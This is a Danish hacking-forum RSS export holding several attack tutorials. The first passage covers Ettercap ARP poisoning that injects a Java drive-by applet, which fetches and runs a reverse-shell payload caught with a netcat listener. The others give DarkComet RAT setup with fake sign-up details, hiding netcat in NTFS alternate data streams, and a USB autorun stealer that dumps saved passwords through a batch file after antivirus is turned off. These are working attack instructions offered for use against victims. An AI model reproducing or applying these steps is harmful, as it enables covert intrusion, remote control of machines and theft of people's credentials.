På <span style="font-style: italic;" class="mycode_i">øverste</span> <span style="font-weight: bold;" class="mycode_b">OG</span> <span style="font-style: italic;" class="mycode_i">fjerde-nederste linie</span> står der skrevet <span style="font-weight: bold;" class="mycode_b">‘VORES.IP’</span>. Dette skal være <span style="font-weight: bold;" class="mycode_b">vores egen IP</span>, og Ettercap bruger denne til at tjekke for fuldendt injicering.<br />
<span style="font-weight: bold;" class="mycode_b">Routeren</span> har givet os en <span style="font-weight: bold;" class="mycode_b">lokal IP</span>, så den kan finde og udlevere data til og fra os. Det er denne IP, vi skal bruge øverst. For at finde from til denne, kan vi bruge ifconfig <span style="font-style: italic;" class="mycode_i">(Hvor vi fra Windows kender ipconfig)</span><br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1901_03_03.png" alt="[Billede: Screenshotfrom2014-08-1901_03_03.png]" class="mycode_img" /><br />
<br />
<span style="font-style: italic;" class="mycode_i">(Bemærk at jeg bruger wlan0 da jeg ved dette er interfacet mit trådløse netværkskort er registreret på. Hvad vi skal bruge her er vores inet adresse. Den eneste grund til jeg bruger grep, er for at mindske resultatet og gøre det lidt mere overskueligt)</span><br />
<br />
Desuden ser vi <span style="font-weight: bold;" class="mycode_b">4 andre steder i filteret</span> hvor der står <span style="font-weight: bold;" class="mycode_b">'SERVER.IP'</span>. Disse er placeret inde i <span style="font-weight: bold;" class="mycode_b">iFrame tags</span>, og skal pege på den <span style="font-weight: bold;" class="mycode_b">IP eller DOMÆNE</span> hvor vi kører vores <span style="font-weight: bold;" class="mycode_b">’ondsindet’ kode</span>. Dette kan være alt lige fra <span style="text-decoration: underline;" class="mycode_u">Javascript keylogger/form grabber, IP logger, BeEF, Metasploit autopwn. Man kan jo også lave sit eget lille exploit kit med nogle af følgende: Internet Explorer exploit, Java exploit med Java applet drive-by som fallback, Adobe Flash exploit med falsk opdatering som fallback, AddJavascriptInterface exploit til Android + APK download som fallback osv.</span><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 4</span></span><br />
I dette eksempel vil jeg nøjes med følgende java drive-by:<br />
<a href="https://mega.co.nz/#F!P49QHbKa!BvW2MEo_mIhpPTeKoy3kDw" target="_blank" rel="noopener" class="mycode_url">https://mega.co.nz/#F!P49QHbKa!BvW2MEo_mIhpPTeKoy3kDw</a><br />
Det er et meget simpelt drive-by der kun kræver disse 3 filer:<br />
<span style="font-weight: bold;" class="mycode_b">Index.html<br />
drive.jar<br />
pload.exe</span> <span style="font-style: italic;" class="mycode_i">(Den fil vi ønsker at køre på vores ”ofres” computere)</span><br />
Nu gældet det så bare om at kopiere filerne til den mappe vi kører vores server fra.<br />
Index.html ser således ud:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>&lt;applet code="__JAVA__.class" archive="drive.jar" width="0" height="0"&gt;<br />
&lt;param name="filename" value="pload.exe"&gt;<br />
&lt;param name="urserver" value="http://192.168.0.101/pload.exe"&gt;<br />
&lt;/applet&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;</blockquote>
Parametrene er opsat på denne måde:<br />
<span style="font-weight: bold;" class="mycode_b">archive</span> skal pege på vores kompilerede .jar java fil.<br />
<span style="font-weight: bold;" class="mycode_b">filename</span> angiver hvad filen skal hedde efter den er hentet ned på ofrets computer.<br />
<span style="font-weight: bold;" class="mycode_b">urserver</span> peger på serveren og filnavnet på den fil vi vil lade vores drive-by applet køre. I dette tilfælde er det vores reverse_tcp payload. <br />
<br />
Har bare valgt at bruge <span style="font-weight: bold;" class="mycode_b">Apache</span> og den tilhørende mappe <span style="font-weight: bold;" class="mycode_b">/var/www</span><br />
Bare træk filerne over i mappen eller brug <span style="text-decoration: underline;" class="mycode_u">cp</span> hvis du vil være awesome.<br />
<br />
Nu kan vi så starte Apache. Det kan du gøre fra <span style="font-weight: bold;" class="mycode_b">'Applications'</span> menuen, køre <span style="font-weight: bold;" class="mycode_b">'apache2ctl'</span> eller bare bruge <span style="font-weight: bold;" class="mycode_b">'init.d'</span> som i dette eksempel - <span style="text-decoration: underline;" class="mycode_u">Det er igen en smagssag</span>.<br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1900_59_56.png" alt="[Billede: Screenshotfrom2014-08-1900_59_56.png]" class="mycode_img" /> <br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 5</span></span><br />
Når din server kører og er klar til at levere vores exploit kan vi gå videre til at <span style="font-weight: bold;" class="mycode_b">kompilere</span> vores <span style="font-weight: bold;" class="mycode_b">Ettercap filter</span>. Desværre er <span style="font-weight: bold;" class="mycode_b">Ettercap</span> ikke lavet sådan at vi kan scripte uden at kompilere, men heldigvis tager det ikke mere end 5 sekunder.<br />
<br />
Vi vil her bruge <span style="font-weight: bold;" class="mycode_b">Etterfilter</span>. <span style="font-weight: bold;" class="mycode_b">Etterfilter</span> er en del af <span style="font-weight: bold;" class="mycode_b">Ettercap</span>, og kræver at vi specificerer en <span style="text-decoration: underline;" class="mycode_u">input-fil[u] <span style="font-style: italic;" class="mycode_i">(filteret der skal kompileres)</span> og en [u]output-fil</span> <span style="font-style: italic;" class="mycode_i">(filteret Efter kompilering)</span>. I dette eksempel er mit filter placeret i <span style="font-weight: bold;" class="mycode_b">/root/</span> mappen - samme mappe som konsollen arbejder i uden at du selv har angivet andet. Så hvis dit filter er gemt i en anden mappe, eller hvis du har ændret konsollens arbejdsmappe til noget andet, så sørg for at tilføje filstien når du kører etterfilter. Du kan faktisk bare trække filen ind i konsollen, og så får du den fulde sti. <br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1901_03_48.png" alt="[Billede: Screenshotfrom2014-08-1901_03_48.png]" class="mycode_img" /><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 6</span></span><br />
Nu kan vi så køre Ettercap med følgende parametre:<br />
<span style="font-weight: bold;" class="mycode_b">-T &lt;Text mode&gt;</span> – Det ville ikke give mening at køre GUI mode her, så vi kører i text mode i konsollen<br />
<span style="font-weight: bold;" class="mycode_b">–i &lt;Interface&gt;</span> - Samme interface som vi fandt  tidligere – altså vores netværkskort)<br />
<span style="font-weight: bold;" class="mycode_b">–q &lt;Quite mode&gt;</span> - Så vi ikke bliver overvældet af pakkedata, men kun får brugbare informationer såsom forbundne enheder og filter data<br />
<span style="font-weight: bold;" class="mycode_b">–F &lt;Filter&gt;</span> - Filteret vi kompilerede før<br />
<span style="font-weight: bold;" class="mycode_b">–M &lt;MiTM&gt;</span> - Man-in-The-Middle angreb. Desuden burger vi ARP til at specificere at vores angreb skal forgifte vores ofres ARP-caches, så deres pakker bliver sendt videre til Vores PC hvor vi kan ændre dem on-the-fly<br />
<span style="font-weight: bold;" class="mycode_b"> // // &lt;Target 1 + Target 2&gt;</span> - Her vælger vi targets. I dette eksempel er ALLE IP’er targets, men du kan også vælge en enkelt IP (192.168.0.105)  eller en række (192.168.0.105-110) som ’Target 1’ efterfulgt af routerens IP som ’Target 2’ (192.168.0.1)<br />
<span style="font-weight: bold;" class="mycode_b">-P &lt;Plugin&gt;</span> - Her kan vi vælge hvilke plugins ettercap skal loade og køre under vores angreb. Der er mange spændende muligheder, men har kun valg at bruge ’autoadd’, der automatisk tilføjer nye Targets efterhånden som ettercap opdager dem.<br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1901_05_34.png" alt="[Billede: Screenshotfrom2014-08-1901_05_34.png]" class="mycode_img" /><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Trin 7</span></span><br />
Da vi har valgt at bruge vores <span style="font-weight: bold;" class="mycode_b">reverse_tcp payload</span> skal vi også have en <span style="font-weight: bold;" class="mycode_b">listnener</span> af en slags kørende klar til at modtage indgående forbindelser. Det kan være alle slags listeners, såfrem de er kompatible med vores payload. Har valgt at bruge <span style="font-weight: bold;" class="mycode_b">Netcat</span>, men du kan også bruge en af <span style="font-weight: bold;" class="mycode_b">Metasploit’s handlers</span>. <br />
<span style="font-weight: bold;" class="mycode_b">-l</span> - Fortæller Netcat at vi vil ’lytte’ efter <span style="font-weight: bold;" class="mycode_b">indgående forbindelser</span>, i stedet for selv at udføre en udgående forbindelse<br />
<span style="font-weight: bold;" class="mycode_b">-v</span> – Giver os simple beskeder om Netcats aktivitet<br />
<span style="font-weight: bold;" class="mycode_b">-p</span> – Porten Netcat skal ’lytte efter’<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Nc –lvp 9191</blockquote>
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Done!</span></span><br />
Hvis vi besøger en tilfældig <span style="font-weight: bold;" class="mycode_b">HTTP</span> side nu, kan vi se i vores <span style="font-weight: bold;" class="mycode_b">Ettercap terminal</span>, at vores filter virker lige som det skal. Hvis du ikke har ændret i filteret før du kompilerede det, vil dit <span style="font-weight: bold;" class="mycode_b">output</span> se nogenlunde således ud:<br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1916_51_09.png" alt="[Billede: Screenshotfrom2014-08-1916_51_09.png]" class="mycode_img" /> <br />
<br />
<br />
<br />
<img src="http://anony.ws/i/2014/08/24/v22.png" alt="[Billede: v22.png]" class="mycode_img" /><br />
<span style="font-style: italic;" class="mycode_i">(Kan se der står taipans - hvis jeg husker rigtigt er det Java Drive-by Applet' fra FinFisher Web. Testede deres applet da jeg skrev denne tutorial, så det skulle være den eneste grund til at der ikke står <span style="font-weight: bold;" class="mycode_b">_JAVA_</span>, hvilket der gør i det Drive-By jeg linkede til)</span> <br />
<span style="font-weight: bold;" class="mycode_b">Desuden bruger jeg Internet Explorer for at undgå de sikkerhedsforanstaltninger Firefox og Chrome bruger! - Nemlig Click-2-Play</span><br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: large;" class="mycode_size">Hvis vi vælger at køre dette <span style="font-weight: bold;" class="mycode_b">applet</span>, kan vi se at vores <span style="font-weight: bold;" class="mycode_b">payload</span> bliver kørt, og vi får med det samme en <span style="font-weight: bold;" class="mycode_b">reverse_tcp shell</span> ved hjælp af <span style="font-weight: bold;" class="mycode_b">Netcat</span>. </span><br />
<img src="http://anony.ws/i/2014/08/24/Screenshotfrom2014-08-1916_49_54.png" alt="[Billede: Screenshotfrom2014-08-1916_49_54.png]" class="mycode_img" /><br />
<br />
<br />
<br />
<br />
<br />
<span style="font-size: large;" class="mycode_size">Og lige for en god ordens skyld tjekker vi lige om det nu også er vores testmaskine vi har inficeret, og <span style="text-decoration: underline;" class="mycode_u"><span style="font-style: italic;" class="mycode_i">ikke</span> en tilfældig forbipasserende på netværket</span>:</span><br />
<img src="http://anony.ws/i/2014/08/24/success.png" alt="[Billede: success.png]" class="mycode_img" />]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[DarkComet]]></title>
			<link>https://www.shellsec.pw/traad-darkcomet</link>
			<pubDate>Tue, 03 Dec 2013 14:45:49 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-darkcomet</guid>
			<description><![CDATA[Tænkte jeg lige ville lave en lille guide med DarkComet, da flere folk gerne vil have det til at virker, og der har været nogle stks der spøgerpå ss hvordan man sætter det op :D Jeg vil derfor ikke gå i dybden med teori, da stortset alle kender til det.<br />
<br />
<span style="color: #DAA520;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Jeg er ikke ansvarlig for hvordan i bruger det her program!</span></span><br />
<br />
Download link: <a href="http://adf.ly/RUmJ9" target="_blank" rel="noopener" class="mycode_url">http://adf.ly/RUmJ9</a><br />
(fandt lige linket på HF.... Find et selv ellers..)<br />
<br />
OKay...<br />
Det første vi skal er at lave en account på "no-ip"<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>http://www.no-ip.com</code></div></div>Her trykker i så på "sing-up" og  på free dns, derefter udfylder jeres fake informationer.<br />
brug evt. info her fra: <br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>http://da.fakenamegenerator.com/</code></div></div><br />
Så skal i vælge jeres OS, og derefter downloade det.<br />
<br />
Nu logger i så ind på jeres account og trykker "add host"<br />
<img src="http://i.imgur.com/rnOBrON.png" alt="[Billede: rnOBrON.png]" class="mycode_img" /><br />
<br />
Nu vælger i så at lave en host med "NO-IP.BIZ" Og giver hosten et eller andet navn.<br />
Nu åbner i så no-ip som i har downloadet og  logger ind.<img src="http://i.imgur.com/F4PlK.png" alt="[Billede: F4PlK.png]" class="mycode_img" /><br />
<br />
Nu trykker i så på "Select Host" <br />
Der skulle gerne stæ jeres host navn:<br />
<img src="http://i.imgur.com/tZtN6.png" alt="[Billede: tZtN6.png]" class="mycode_img" /><br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="color: #FF1493;" class="mycode_color">Sådan! Nu har du sat "no-ip" op :D</span></span><br />
<br />
Nu til DarkComet:<br />
1: i skal portforword, jeg regner med at lave en guide på et tidspunkt, men ellers er det altså også nemt! DEt kan gøres via "utorrent" eller din router.<br />
<br />
2:<br />
Åben dit DarkComet det her er v5.3:<br />
<img src="http://i.imgur.com/ve7C8.png" alt="[Billede: ve7C8.png]" class="mycode_img" /><br />
3:<br />
Klik på DarkComeet-Rat i venstre hjørne, og tryk "listen" Der indsætter du så den port som, du portforworded før.<br />
<img src="http://i.imgur.com/Masvf.png" alt="[Billede: Masvf.png]" class="mycode_img" /><br />
4:<br />
Nu klik på "server moodul" <br />
<img src="http://i.imgur.com/5mRhb.png" alt="[Billede: 5mRhb.png]" class="mycode_img" /><br />
5:<br />
Ret så det ser sådan her ud: (crypter du så ikke tryk firewall)<br />
<img src="http://i.imgur.com/mp5JJ.png" alt="[Billede: mp5JJ.png]" class="mycode_img" /><br />
6:<br />
Ændre domain og ip, til det du har lavet med "No-ip"<br />
<img src="http://i.imgur.com/VLfws.png" alt="[Billede: VLfws.png]" class="mycode_img" /><br />
7:<br />
Ikke klik på "Module startup"  hvis din crypter har en startup som en mulighed. Skip altinger undtangen det du behøver. Klik på "Build Module" og lad det stå som det er.<br />
<img src="http://i.imgur.com/oPERd.png" alt="[Billede: oPERd.png]" class="mycode_img" /><br />
<br />
Lycia OUT.]]></description>
			<content:encoded><![CDATA[Tænkte jeg lige ville lave en lille guide med DarkComet, da flere folk gerne vil have det til at virker, og der har været nogle stks der spøgerpå ss hvordan man sætter det op :D Jeg vil derfor ikke gå i dybden med teori, da stortset alle kender til det.<br />
<br />
<span style="color: #DAA520;" class="mycode_color"><span style="font-size: large;" class="mycode_size">Jeg er ikke ansvarlig for hvordan i bruger det her program!</span></span><br />
<br />
Download link: <a href="http://adf.ly/RUmJ9" target="_blank" rel="noopener" class="mycode_url">http://adf.ly/RUmJ9</a><br />
(fandt lige linket på HF.... Find et selv ellers..)<br />
<br />
OKay...<br />
Det første vi skal er at lave en account på "no-ip"<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>http://www.no-ip.com</code></div></div>Her trykker i så på "sing-up" og  på free dns, derefter udfylder jeres fake informationer.<br />
brug evt. info her fra: <br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>http://da.fakenamegenerator.com/</code></div></div><br />
Så skal i vælge jeres OS, og derefter downloade det.<br />
<br />
Nu logger i så ind på jeres account og trykker "add host"<br />
<img src="http://i.imgur.com/rnOBrON.png" alt="[Billede: rnOBrON.png]" class="mycode_img" /><br />
<br />
Nu vælger i så at lave en host med "NO-IP.BIZ" Og giver hosten et eller andet navn.<br />
Nu åbner i så no-ip som i har downloadet og  logger ind.<img src="http://i.imgur.com/F4PlK.png" alt="[Billede: F4PlK.png]" class="mycode_img" /><br />
<br />
Nu trykker i så på "Select Host" <br />
Der skulle gerne stæ jeres host navn:<br />
<img src="http://i.imgur.com/tZtN6.png" alt="[Billede: tZtN6.png]" class="mycode_img" /><br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="color: #FF1493;" class="mycode_color">Sådan! Nu har du sat "no-ip" op :D</span></span><br />
<br />
Nu til DarkComet:<br />
1: i skal portforword, jeg regner med at lave en guide på et tidspunkt, men ellers er det altså også nemt! DEt kan gøres via "utorrent" eller din router.<br />
<br />
2:<br />
Åben dit DarkComet det her er v5.3:<br />
<img src="http://i.imgur.com/ve7C8.png" alt="[Billede: ve7C8.png]" class="mycode_img" /><br />
3:<br />
Klik på DarkComeet-Rat i venstre hjørne, og tryk "listen" Der indsætter du så den port som, du portforworded før.<br />
<img src="http://i.imgur.com/Masvf.png" alt="[Billede: Masvf.png]" class="mycode_img" /><br />
4:<br />
Nu klik på "server moodul" <br />
<img src="http://i.imgur.com/5mRhb.png" alt="[Billede: 5mRhb.png]" class="mycode_img" /><br />
5:<br />
Ret så det ser sådan her ud: (crypter du så ikke tryk firewall)<br />
<img src="http://i.imgur.com/mp5JJ.png" alt="[Billede: mp5JJ.png]" class="mycode_img" /><br />
6:<br />
Ændre domain og ip, til det du har lavet med "No-ip"<br />
<img src="http://i.imgur.com/VLfws.png" alt="[Billede: VLfws.png]" class="mycode_img" /><br />
7:<br />
Ikke klik på "Module startup"  hvis din crypter har en startup som en mulighed. Skip altinger undtangen det du behøver. Klik på "Build Module" og lad det stå som det er.<br />
<img src="http://i.imgur.com/oPERd.png" alt="[Billede: oPERd.png]" class="mycode_img" /><br />
<br />
Lycia OUT.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Windows XP ADS i NTFS]]></title>
			<link>https://www.shellsec.pw/traad-windows-xp-ads-i-ntfs</link>
			<pubDate>Sun, 03 Nov 2013 04:15:58 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-windows-xp-ads-i-ntfs</guid>
			<description><![CDATA[<span style="font-weight: bold;" class="mycode_b">Intro:</span><br />
ADS står for Alternate Data Stream, og er en funktion der eksisterer i Microsofts NTFS filsystem.<br />
Oprindeligt er det vist for at have noget kompabilitet med nogle ældre Machintosh filsystemer.<br />
Dette virker, så vidt jeg ved, i Windows XP og ældre Microsoft operativ systemer.<br />
Nyere operativ systemer benytter OLE 2.0 structured storage (IStream and IStorage), som jeg desværre ikke har erfaring med.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Lidt om ADS:</span><br />
ADS tillader at gemme filer i andre filer uden at påvirke de eksisterende filer.<br />
Dvs. den originale fil, skifter ikke filstørrelse eller lign., når en anden fil gemmes oven i den.<br />
Man vil heller ikke kunne se den nye fil, når man lister et directory med "dir" kommandoen. Derfor er det også vigtigt, man husker på, hvor man har gemt sin fil. Evt. brug den samme fil alle steder, man ønsker at bruge ADS.<br />
For at se disse filer, som er gemt med ADS, skal man bruge nogle specielle værktøjer.<br />
Umiddelbart lyder det lidt underligt at gemme en fil, oven i en anden fil, men det bliver forhåbentligt klart, med et eksempel.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Gem NetCat med ADS:</span><br />
Lad os antage, vil gerne vil gemme NetCat på en windows computer,<br />
men gerne vil skjule den fra brugeren, så kan vi gemme nc.exe oven i f.eks. notepad.exe.<br />
Det er ikke et krav, at den fil, vi bruger til at skjule nc.exe i, er en eksekverbar fil.<br />
Det kan lige så vel være en tekst fil. Det er selvfølgelig smart at vælge en fil, vi er sikker på, ikke bliver slettet.<br />
F.eks. en fil, som følger med windows. Man skal bare overveje, om det er en som biver overskrevet af patches.<br />
<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>c:&#92;Windows&#92;System32&gt;type nc.exe &gt; notepad.exe:nc.exe</code></div></div><br />
Windows kommandoen type, skriver bare indholdet af nc.exe ud på skærmen. Dette er tilsvarende cat, more osv, på linux.<br />
Vi tager så outputtet fra type, altså indholdet af nc.exe og piper det med "&gt;" over i notepad.exe.<br />
Vi vil så frem over referere til nc.exe under navnet "notepad.exe:nc.exe".<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Eksekvering af NetCat:</span><br />
Når vi skal starte nc.exe, som er gemt i notepad.exe, bruger vi windows kommandoen "start".<br />
<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>c:&#92;Windows&#92;System32&gt;start notepad.exe:nc.exe</code></div></div><br />
Så simpelt er det! Man skal selvfølgelig slette den originale nc.exe, den som ikke er gemt via ADS. Dette påvirker ikke notepad.exe:nc.exe filen.<br />
Det kan selvfølgelig gøres med "del" kommandoen. Hvis det gøres over Metasploit Meterpreter, er det en god idé at bruge "/Q" parametren, da man ellers kan miste sin session.<br />
Den fortæller "del" kommandoen, man ønsker at bruge Quiet mode, hvilket betyder man ikke ønsker at blive prompted for noget.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Browsing ADS filer:</span><br />
For at se, hvad der gemmer sig i ADS på notepad.exe, kan man bruge windows kommandoen "more" hvor vi piper indholder af notepad.exe:nc.exe ud i more kommandoen med "&lt;".<br />
<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>c:&#92;Windows&#92;System32&gt;more &lt; notepad.exe:nc.exe</code></div></div><br />
Dette er dog ikke så brugbart, hvis det er en eksekverbar fil, man har gemt i notepad.exe.<br />
Det kan selvfølgelig lige så godt være en tekstfil med dumps af NTML hashes, eller hvad man nu har fået fingre i.<br />
<br />
<br />
Links:<br />
<a href="http://support.microsoft.com/kb/105763" target="_blank" rel="noopener" class="mycode_url">http://support.microsoft.com/kb/105763</a><br />
<a href="http://en.wikipedia.org/wiki/COM_Structured_Storage" target="_blank" rel="noopener" class="mycode_url">http://en.wikipedia.org/wiki/COM_Structured_Storage</a><br />
<br />
EDIT:<br />
I nyere windows, kan man se filer med ADS indhold, ved at bruge kommandoen "dir /R".]]></description>
			<content:encoded><![CDATA[<span style="font-weight: bold;" class="mycode_b">Intro:</span><br />
ADS står for Alternate Data Stream, og er en funktion der eksisterer i Microsofts NTFS filsystem.<br />
Oprindeligt er det vist for at have noget kompabilitet med nogle ældre Machintosh filsystemer.<br />
Dette virker, så vidt jeg ved, i Windows XP og ældre Microsoft operativ systemer.<br />
Nyere operativ systemer benytter OLE 2.0 structured storage (IStream and IStorage), som jeg desværre ikke har erfaring med.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Lidt om ADS:</span><br />
ADS tillader at gemme filer i andre filer uden at påvirke de eksisterende filer.<br />
Dvs. den originale fil, skifter ikke filstørrelse eller lign., når en anden fil gemmes oven i den.<br />
Man vil heller ikke kunne se den nye fil, når man lister et directory med "dir" kommandoen. Derfor er det også vigtigt, man husker på, hvor man har gemt sin fil. Evt. brug den samme fil alle steder, man ønsker at bruge ADS.<br />
For at se disse filer, som er gemt med ADS, skal man bruge nogle specielle værktøjer.<br />
Umiddelbart lyder det lidt underligt at gemme en fil, oven i en anden fil, men det bliver forhåbentligt klart, med et eksempel.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Gem NetCat med ADS:</span><br />
Lad os antage, vil gerne vil gemme NetCat på en windows computer,<br />
men gerne vil skjule den fra brugeren, så kan vi gemme nc.exe oven i f.eks. notepad.exe.<br />
Det er ikke et krav, at den fil, vi bruger til at skjule nc.exe i, er en eksekverbar fil.<br />
Det kan lige så vel være en tekst fil. Det er selvfølgelig smart at vælge en fil, vi er sikker på, ikke bliver slettet.<br />
F.eks. en fil, som følger med windows. Man skal bare overveje, om det er en som biver overskrevet af patches.<br />
<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>c:&#92;Windows&#92;System32&gt;type nc.exe &gt; notepad.exe:nc.exe</code></div></div><br />
Windows kommandoen type, skriver bare indholdet af nc.exe ud på skærmen. Dette er tilsvarende cat, more osv, på linux.<br />
Vi tager så outputtet fra type, altså indholdet af nc.exe og piper det med "&gt;" over i notepad.exe.<br />
Vi vil så frem over referere til nc.exe under navnet "notepad.exe:nc.exe".<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Eksekvering af NetCat:</span><br />
Når vi skal starte nc.exe, som er gemt i notepad.exe, bruger vi windows kommandoen "start".<br />
<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>c:&#92;Windows&#92;System32&gt;start notepad.exe:nc.exe</code></div></div><br />
Så simpelt er det! Man skal selvfølgelig slette den originale nc.exe, den som ikke er gemt via ADS. Dette påvirker ikke notepad.exe:nc.exe filen.<br />
Det kan selvfølgelig gøres med "del" kommandoen. Hvis det gøres over Metasploit Meterpreter, er det en god idé at bruge "/Q" parametren, da man ellers kan miste sin session.<br />
Den fortæller "del" kommandoen, man ønsker at bruge Quiet mode, hvilket betyder man ikke ønsker at blive prompted for noget.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Browsing ADS filer:</span><br />
For at se, hvad der gemmer sig i ADS på notepad.exe, kan man bruge windows kommandoen "more" hvor vi piper indholder af notepad.exe:nc.exe ud i more kommandoen med "&lt;".<br />
<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>c:&#92;Windows&#92;System32&gt;more &lt; notepad.exe:nc.exe</code></div></div><br />
Dette er dog ikke så brugbart, hvis det er en eksekverbar fil, man har gemt i notepad.exe.<br />
Det kan selvfølgelig lige så godt være en tekstfil med dumps af NTML hashes, eller hvad man nu har fået fingre i.<br />
<br />
<br />
Links:<br />
<a href="http://support.microsoft.com/kb/105763" target="_blank" rel="noopener" class="mycode_url">http://support.microsoft.com/kb/105763</a><br />
<a href="http://en.wikipedia.org/wiki/COM_Structured_Storage" target="_blank" rel="noopener" class="mycode_url">http://en.wikipedia.org/wiki/COM_Structured_Storage</a><br />
<br />
EDIT:<br />
I nyere windows, kan man se filer med ADS indhold, ved at bruge kommandoen "dir /R".]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[USB Stealer]]></title>
			<link>https://www.shellsec.pw/traad-usb-stealer</link>
			<pubDate>Thu, 03 Oct 2013 11:16:09 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-usb-stealer</guid>
			<description><![CDATA[Det her er en guide til at lave en Usb Stealer. (Fandt lige det på et gammel usb stik, og tænkte det vil jeg dele med jer (Y))<br />
Målet er at få et Usb stik man bare stikker ind, også åbner du et batch fil, også har man alle Passwords og de informationer man vælger.<br />
Det man henter er ikke FUD (Fully undetectable) Så det vil sige smider du dit usb stik i, så siger alle med et virus program at der er noget virus, også bliver de slettet<br />
Så man skal enten Selv lave den FUD, ellers så skal man slå virus programet fra på den pågældende computer.<br />
Jeg giver jer en "smagsprøve" på hvad man kan vælge for at få nogle stks. passwords, man kan vælge mellem en masse forskellige ting her: <a href="http://www.nirsoft.net/utils/" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/utils/</a><br />
Efter man har hente følgende ting:<br />
<a href="http://www.nirsoft.net/utils/mspass.html" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/utils/mspass.html</a> - Det er stealern til alle mail programmer.<br />
<a href="http://www.nirsoft.net/utils/mailpv.html" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/utils/mailpv.html</a> - OGså til mails<br />
<a href="http://www.nirsoft.net/utils/internet_explorer_password.html" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/utils/internet_ex...sword.html</a> internet explorer Pass stealer<br />
<a href="http://www.nirsoft.net/utils/pspv.html" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/utils/pspv.html</a> - Alt microsoft pass stealer<br />
<a href="http://www.nirsoft.net/utils/router_password_recovery.html" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/utils/router_pass...overy.html</a> - Gemte Password på routern<br />
<a href="http://www.nirsoft.net/utils/network_password_recovery.html" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/utils/network_pas...overy.html</a> Passwords og usernames på netværket<br />
<a href="http://www.nirsoft.net/utils/dialupass.html" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/utils/dialupass.html</a> - Gemte netværks på Computern samt koder til netværket<br />
<a href="http://www.nirsoft.net/utils/passwordfox.html" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/utils/passwordfox.html</a> - Firefox pass stealer<br />
<a href="http://www.nirsoft.net/utils/chromepass.html" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/utils/chromepass.html</a> - crome<br />
Her er der lidt andre ting i også kan finde: <a href="http://www.nirsoft.net/password_recovery_tools.html" target="_blank" rel="noopener" class="mycode_url">http://www.nirsoft.net/password_recovery_tools.html</a><br />
<br />
Du henter filerne og unpacker dem (husk at slå antivirus programmet på din computer fra) og så lig dem over på dit Usb stik, i en mappe (vi kalder mappen usb drivers)<br />
Nu skal vi så igang med det sjove.<br />
Åbne dit notepad<br />
skriv følgende:<br />
<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>[autorun]<br />
open=launch.bat<br />
ACTION= Perform a Virus Scan</code></div></div>Nu gemmer du så din notepad fil, som autorun.inf (husk at det altså ikke skal være.txt men .inf)<br />
Gem din fil i mappen "usb drivers" Altså den vi lagde de andre filer ind i på usb stikket.<br />
<br />
Når du har gjort det åbner du et nyt notepad dokoment.<br />
skriv følgende:<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>start mspass.exe /stext mspass.txt<br />
start mailpv.exe /stext mailpv.txt<br />
start iepv.exe /stext iepv.txt<br />
start pspv.exe /stext pspv.txt<br />
start passwordfox.exe /stext passwordfox.txt<br />
start routerpassview.exe /stext routerpassview.txt<br />
start netpass.exe /stext netpass.txt<br />
start chromepass.exe /stext chromepass.exe</code></div></div><br />
Så gemmer du den notepad fil som launch.bat igen husk det skal være .bat og ikke .txt<br />
